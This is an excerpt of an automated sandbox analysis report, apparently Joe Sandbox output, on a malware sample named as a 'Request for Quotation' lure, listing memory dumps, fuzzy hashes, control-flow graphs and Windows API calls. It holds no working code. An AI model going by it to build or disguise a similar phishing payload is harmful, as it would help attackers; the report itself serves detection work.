                                                                                                                                  • Opcode Fuzzy Hash: e4e5b73d9dfa2a42e605cc04ccc72f3b60b86a75fda9d3a5dfbd373d6dae3319
                                                                                                                                  • Instruction Fuzzy Hash: 571126BA810289DFDB11CF99C941BEEBFF4EF48320F148419E568A7610C339A550DFA5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 8X75hX75
                                                                                                                                  • API String ID: 0-151516257
                                                                                                                                  • Opcode ID: 7b31b5bde16ec990c3534202ac63e58d9228d4d9eb53d7d265655931b89e454b
                                                                                                                                  • Instruction ID: e8fb62ecc62d5d5cddd3d78ac4a5e382585b0c645f065020a63f253309154b51
                                                                                                                                  • Opcode Fuzzy Hash: 7b31b5bde16ec990c3534202ac63e58d9228d4d9eb53d7d265655931b89e454b
                                                                                                                                  • Instruction Fuzzy Hash: 478113B4E00208CBEB04DFAAD9806DDBBF2BF89310F24852AD854BB355DB359946CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 052728bdd520e9223fb3c80d470a9d3a91036db83075313a7369532af733e14f
                                                                                                                                  • Instruction ID: d7408c49833dbfaede3812005bc59bd7906c84cbb538f2d79c12b4ad4b321442
                                                                                                                                  • Opcode Fuzzy Hash: 052728bdd520e9223fb3c80d470a9d3a91036db83075313a7369532af733e14f
                                                                                                                                  • Instruction Fuzzy Hash: 8C829F74A01228CFDB25DF64C894B9DBBB2FF89300F1085A9D909A7364CB359E92DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9ece5ca1be24c57ae29807ea854a15097b5b4500f189e4c4b89ffbf8e0ba9df
                                                                                                                                  • Instruction ID: 6960bfbcc8926be009a1c0550b64b0cfc456cf598480ef898ba41572546c5e84
                                                                                                                                  • Opcode Fuzzy Hash: d9ece5ca1be24c57ae29807ea854a15097b5b4500f189e4c4b89ffbf8e0ba9df
                                                                                                                                  • Instruction Fuzzy Hash: 1672A074A01228CFDB25DF64C894BADBBB2FF89300F1085A9D909A7364CB359E91DF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 243232f1b60af965d3c090ead64494b543db305d26cc2118ce843e4f5897878c
                                                                                                                                  • Instruction ID: 6817308ed41cb137ed8a73b1f866b22cee853abfa14ab6d0f55b27a26c280352
                                                                                                                                  • Opcode Fuzzy Hash: 243232f1b60af965d3c090ead64494b543db305d26cc2118ce843e4f5897878c
                                                                                                                                  • Instruction Fuzzy Hash: D1729F74E012288FEB64DF69C984BDDBBB2BF49300F5085EAD409A7255DB35AE81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 085681839d73eaacaa679a25e74b9a4c168e6e524f11c7caff2229c080808470
                                                                                                                                  • Instruction ID: 5b9ba7f02f36f724d212ac01502eeeb309a5b168ce700cabfd7c2cffc3c96466
                                                                                                                                  • Opcode Fuzzy Hash: 085681839d73eaacaa679a25e74b9a4c168e6e524f11c7caff2229c080808470
                                                                                                                                  • Instruction Fuzzy Hash: 4AE1A274E01218CFEB15DFA5C854B9DBBB2BF89300F1081A9D809BB395DB755A85CF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809354798.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_150000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c455f2c8f9c46389bfd6a5dfdc19a7b6ffd414de645127256af4589a729a2fe2
                                                                                                                                  • Instruction ID: 1f4102c3a8a1c895f150fd4a3380a646aa967f63ab3ab208319074b98bc47593
                                                                                                                                  • Opcode Fuzzy Hash: c455f2c8f9c46389bfd6a5dfdc19a7b6ffd414de645127256af4589a729a2fe2
                                                                                                                                  • Instruction Fuzzy Hash: 47C19274E00218CFEB14DFA5C994B9DBBB2BF88301F2081A9D819AB365DB355E85CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ec43950beb66d0246d2d6a081c68e8e37e36017b7fabd65a46090cae8bcff738
                                                                                                                                  • Instruction ID: 8fef0d254d73d9faaefb9ae65466f181f846080a481a4a3a6b5da2960d644264
                                                                                                                                  • Opcode Fuzzy Hash: ec43950beb66d0246d2d6a081c68e8e37e36017b7fabd65a46090cae8bcff738
                                                                                                                                  • Instruction Fuzzy Hash: 5DC19179E00218CFEB14DFA5C994B9DBBB2BF89300F1081A9D809AB365DB355E85CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809354798.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_150000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d4db5805adbdda2f0521a412693ceebff247ef48eea2a80132b05be2f712e90c
                                                                                                                                  • Instruction ID: 7846deb60a7a4bc0844a7946cb2af0fdb4e215b642640a8b3d6aa57aa64d8fbb
                                                                                                                                  • Opcode Fuzzy Hash: d4db5805adbdda2f0521a412693ceebff247ef48eea2a80132b05be2f712e90c
                                                                                                                                  • Instruction Fuzzy Hash: 1DA10474D00208CFEB14DFA8C944BDDBBB1BF89315F20826AE419BB291DB759985CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6472d6853c03f9fe1dd930111f11aaca5c155781584d27ffd842ffbd542a8e8b
                                                                                                                                  • Instruction ID: 757b4bb76942cd189cd9c02b4d9208d35b778635d52952853ff5efeee237eaa3
                                                                                                                                  • Opcode Fuzzy Hash: 6472d6853c03f9fe1dd930111f11aaca5c155781584d27ffd842ffbd542a8e8b
                                                                                                                                  • Instruction Fuzzy Hash: D7A18FB5E012288FEB18CF6AD944B9DBBF2BF89300F14C5AAD40CA7255DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6c192004f4dee039436b370c22cf1b05b24dfb1f3d1232632b63adec9ed9a8d8
                                                                                                                                  • Instruction ID: 18cb8dc8e359bf0ce9bb9d13de647f00b8aaecda7839245fcaa6dbc20de97628
                                                                                                                                  • Opcode Fuzzy Hash: 6c192004f4dee039436b370c22cf1b05b24dfb1f3d1232632b63adec9ed9a8d8
                                                                                                                                  • Instruction Fuzzy Hash: BAA19FB5E01228CFEB18CF6AD944B9DBBF2BF89300F14D5AAD408A7251DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d35673ec4f50883fb842825dc08f103c11fffccafda994fdc0a749c0acda2ad
                                                                                                                                  • Instruction ID: eeca4dcdbefcf05413dbc815cb76fe7d1935b83e0d8ca14ce6f06f3f65d5f517
                                                                                                                                  • Opcode Fuzzy Hash: 6d35673ec4f50883fb842825dc08f103c11fffccafda994fdc0a749c0acda2ad
                                                                                                                                  • Instruction Fuzzy Hash: 85A190B4E012288FEB14CF6AC944B9EBBF2BF89300F14D5AAD408B7255DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 824028e9893b0f51f06a59e054e673d49e81d328541b6014ac07a84e35ff9e92
                                                                                                                                  • Instruction ID: 3c1c00f52922f9f557f8b7ed5e03003742cc5cc153030b90515d323a4983b68d
                                                                                                                                  • Opcode Fuzzy Hash: 824028e9893b0f51f06a59e054e673d49e81d328541b6014ac07a84e35ff9e92
                                                                                                                                  • Instruction Fuzzy Hash: 0DA1A2B4E012188FEB54CF6AD944B9DBBF2BF89300F14D5AAD408B7255DB345A85CF11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809354798.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_150000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9dddf4ff5bd8f5cff5ff5625d3c3e19a3ef2a81b629a349b41870f129cc66eda
                                                                                                                                  • Instruction ID: ce3fdf819a600ffc2f8ad6a1ae2ee071fa34dbeddc5ac980aeb1e682e315e0fb
                                                                                                                                  • Opcode Fuzzy Hash: 9dddf4ff5bd8f5cff5ff5625d3c3e19a3ef2a81b629a349b41870f129cc66eda
                                                                                                                                  • Instruction Fuzzy Hash: 6F91E570D00208CFEB14DFA8C94879CBBF1FF49311F248269E859AB291DB759A85CF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5a5bad23dfd372eff62790bbe4683c6a15605a4c7438922ef4d72698794f4dd3
                                                                                                                                  • Instruction ID: 8b7b7ec7f7414a800076b0c6215e8edc732c3ccf2b3ecf9fb29feddeed7149d0
                                                                                                                                  • Opcode Fuzzy Hash: 5a5bad23dfd372eff62790bbe4683c6a15605a4c7438922ef4d72698794f4dd3
                                                                                                                                  • Instruction Fuzzy Hash: AC71B1B5D01628CFDB64CF66C9807DDBBB2BF89301F1094AAD409A7364DB349A86CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 596b945c43f3775f4c7a77273b1c7fbb931b325a9df3cf569ee21ea2545d3f1c
                                                                                                                                  • Instruction ID: 03cf94a489403a5af1e6e62bcf3a72f60abe6603b8c57e7864c850f27497066a
                                                                                                                                  • Opcode Fuzzy Hash: 596b945c43f3775f4c7a77273b1c7fbb931b325a9df3cf569ee21ea2545d3f1c
                                                                                                                                  • Instruction Fuzzy Hash: DD7183B5E006288FEB58CF6AC944B9DBBF2AF89300F14C5AAD40CB7255DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a99bb1e2233060dbbb82b7e746cb0a019a59d01a71c8ad750d150ab1bec47ed4
                                                                                                                                  • Instruction ID: 2fb9aa05a3491e0773485d02886a5c59624ce075aceabab5f39e090a2ed05971
                                                                                                                                  • Opcode Fuzzy Hash: a99bb1e2233060dbbb82b7e746cb0a019a59d01a71c8ad750d150ab1bec47ed4
                                                                                                                                  • Instruction Fuzzy Hash: BB61E934A00319CFEB25DF60C894BADBB72FF88700F1080A9990967765DA355D92EF58
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 07afc7b1da0fcf2bf3f57407f7d21dfd7ecc5429bf9081c4f611eb13498b48a8
                                                                                                                                  • Instruction ID: 65c96019af20a762e14cc0f8a4da0c6d6ea349dd7cc5e93c3e7b07c54cc005ba
                                                                                                                                  • Opcode Fuzzy Hash: 07afc7b1da0fcf2bf3f57407f7d21dfd7ecc5429bf9081c4f611eb13498b48a8
                                                                                                                                  • Instruction Fuzzy Hash: 884159B1E016188BEB58CF6BC9457C9FAF3AFC8310F04C1AAC50CA6264EB740A858F51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 027c20ff092dd79c6ac102bda7b5cf61f3b70a91e54de501fc45413b789885ba
                                                                                                                                  • Instruction ID: 9b7b9e0744c8500436425d30522a1dcca3242e96894a335dad69b39e9ccce291
                                                                                                                                  • Opcode Fuzzy Hash: 027c20ff092dd79c6ac102bda7b5cf61f3b70a91e54de501fc45413b789885ba
                                                                                                                                  • Instruction Fuzzy Hash: 954159B1E016188BEB58CF6BD9457DAFAF3BFC8300F14C1AAC50CA6264DB740A858F50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67a79a462f020adfc03fd9d9cfa551bc2c10c19fd0782f07b03dd53b151a8271
                                                                                                                                  • Instruction ID: 9a5537ab23d0aa84e75a3f6265ec4d2492ee600de091970c9c00aa398c9b6481
                                                                                                                                  • Opcode Fuzzy Hash: 67a79a462f020adfc03fd9d9cfa551bc2c10c19fd0782f07b03dd53b151a8271
                                                                                                                                  • Instruction Fuzzy Hash: 3741C2B5E00648CBEB18DFAAD9506DEBBF2AF89300F20D52AD414BB255DB345945CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 38450686
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 384506C3
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 38450700
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 38450759
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: a6f818eb6b186d0438db6ac76be8c03bbb3d25353907bee1ca3a099175972869
                                                                                                                                  • Instruction ID: f35e2d9c73703dbee7f7b2528d028a7662c84214b4860e4352a08096c43f85a0
                                                                                                                                  • Opcode Fuzzy Hash: a6f818eb6b186d0438db6ac76be8c03bbb3d25353907bee1ca3a099175972869
                                                                                                                                  • Instruction Fuzzy Hash: 355188B49003099FEB14CFAAC844BEEBBF1EF88320F208559E459AB361C7749945CF25

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 38450686
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 384506C3
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 38450700
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 38450759
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: 1fc8becaf9cf6ee710bc4759e8574029f9c72a450dcf6ade3d78d3384f636a83
                                                                                                                                  • Instruction ID: 9e0eb7b7a3833797c65cab45af4b6ecad0cae45d5e5dc06384f6cfa617bfa470
                                                                                                                                  • Opcode Fuzzy Hash: 1fc8becaf9cf6ee710bc4759e8574029f9c72a450dcf6ade3d78d3384f636a83
                                                                                                                                  • Instruction Fuzzy Hash: F55166B49003099FDB14CFAAC544BDEBBF1AF88320F208559E459B7361C774A944CF66

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 930 15fd76-15fdfe 931 15fe00-15fe06 930->931 932 15fe09-15fe10 930->932 931->932 933 15fe12-15fe18 932->933 934 15fe1b-15fe53 932->934 933->934 935 15fe5b-15feba CreateWindowExW 934->935 936 15fec3-15fefb 935->936 937 15febc-15fec2 935->937 941 15fefd-15ff00 936->941 942 15ff08 936->942 937->936 941->942 943 15ff09 942->943 943->943
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0015FEAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809354798.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_150000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 3f40a17689fcc88ba2e27c074ec5839c9e7a75d1c7d75f3c67320950d931f401
                                                                                                                                  • Instruction ID: b53723a863e4d8880e44e9f2109323f04075bdb4d578e847d13f1bbf926166d3
                                                                                                                                  • Opcode Fuzzy Hash: 3f40a17689fcc88ba2e27c074ec5839c9e7a75d1c7d75f3c67320950d931f401
                                                                                                                                  • Instruction Fuzzy Hash: 0951C2B1D10248DFDB15CFAAD880ADEBFB1FF48310F25812AE818AB261D7719945CF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 944 15fd4f-15fd58 945 15fd42-15fd48 944->945 946 15fd5a-15fd6c 944->946 945->944 947 15fdcc-15fdfe 946->947 948 15fd6e-15fd71 946->948 949 15fe00-15fe06 947->949 950 15fe09-15fe10 947->950 948->947 949->950 951 15fe12-15fe18 950->951 952 15fe1b-15fe53 950->952 951->952 953 15fe5b-15feba CreateWindowExW 952->953 954 15fec3-15fefb 953->954 955 15febc-15fec2 953->955 959 15fefd-15ff00 954->959 960 15ff08 954->960 955->954 959->960 961 15ff09 960->961 961->961
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0015FEAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809354798.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_150000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 7f915738e2486e255119b47bbb3d912f7095e0ff0e74e5e30a9317a72d4a858f
                                                                                                                                  • Instruction ID: 9d59523dcb396999a855a392792ceb77f9c9038a16f27189efc707fb67d2c558
                                                                                                                                  • Opcode Fuzzy Hash: 7f915738e2486e255119b47bbb3d912f7095e0ff0e74e5e30a9317a72d4a858f
                                                                                                                                  • Instruction Fuzzy Hash: 814117B1D10349DFDB15CF99D850ADEBFB1EF48310F25816AE818AB261D7719846CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 962 15fd98-15fdfe 963 15fe00-15fe06 962->963 964 15fe09-15fe10 962->964 963->964 965 15fe12-15fe18 964->965 966 15fe1b-15feba CreateWindowExW 964->966 965->966 968 15fec3-15fefb 966->968 969 15febc-15fec2 966->969 973 15fefd-15ff00 968->973 974 15ff08 968->974 969->968 973->974 975 15ff09 974->975 975->975
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0015FEAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809354798.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_150000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 3262b13e59d62c1e66a7cba1bbfdbdc0174fb9cf23a02adf29a730c2ef3674e0
                                                                                                                                  • Instruction ID: cef7641dbedbbe9fb205084c90c041282dd6edbde278fd3ce45ce55d88988db2
                                                                                                                                  • Opcode Fuzzy Hash: 3262b13e59d62c1e66a7cba1bbfdbdc0174fb9cf23a02adf29a730c2ef3674e0
                                                                                                                                  • Instruction Fuzzy Hash: 8641BFB1D10248DFDB14CF9AD884ADEBBB5BF48310F25812AE819AB250D7709885CF91

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1080 384514e4-38451a9c 1083 38451aa2-38451aa7 1080->1083 1084 38451b4c-38451b6c 1080->1084 1085 38451aa9-38451ae0 1083->1085 1086 38451afa-38451b32 CallWindowProcW 1083->1086 1090 38451b6f-38451b7c 1084->1090 1093 38451ae2-38451ae8 1085->1093 1094 38451ae9-38451af8 1085->1094 1087 38451b34-38451b3a 1086->1087 1088 38451b3b-38451b4a 1086->1088 1087->1088 1088->1090 1093->1094 1094->1090
                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 38451B21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                  • Opcode ID: fd5c3ae2508962e3de46a60ee94b536e69294b7311e1b10dca203649f2b74fc2
                                                                                                                                  • Instruction ID: bfc148266cff5e4dbb43b16dfa7a838abef2c32cc71c518e4b38ac70db7503dc
                                                                                                                                  • Opcode Fuzzy Hash: fd5c3ae2508962e3de46a60ee94b536e69294b7311e1b10dca203649f2b74fc2
                                                                                                                                  • Instruction Fuzzy Hash: 874129B8900305DFDB10CF99C484A9EBBF5FF88324F24C459E559AB721D774A841CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1096 38450849-384508e4 DuplicateHandle 1098 384508e6-384508ec 1096->1098 1099 384508ed-3845090a 1096->1099 1098->1099
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 384508D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837563871.0000000038450000.00000040.00000800.00020000.00000000.sdmp, Offset: 38450000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_38450000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: d898ab4d7c2d287f1d3265bc130ed18942d6cecc8d2009e39c53db3552604030
                                                                                                                                  • Instruction ID: 289e421b2015c87974a90b4ba0ebfea70c892d8b5b292c26b3ee7f900fd5c251
                                                                                                                                  • Opcode Fuzzy Hash: d898ab4d7c2d287f1d3265bc130ed18942d6cecc8d2009e39c53db3552604030
                                                                                                                                  • Instruction Fuzzy Hash: CA21E5B5D01249AFDB11CFAAD880AEEFBF4EB48320F14845AE954A7310C375A954CFA5

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
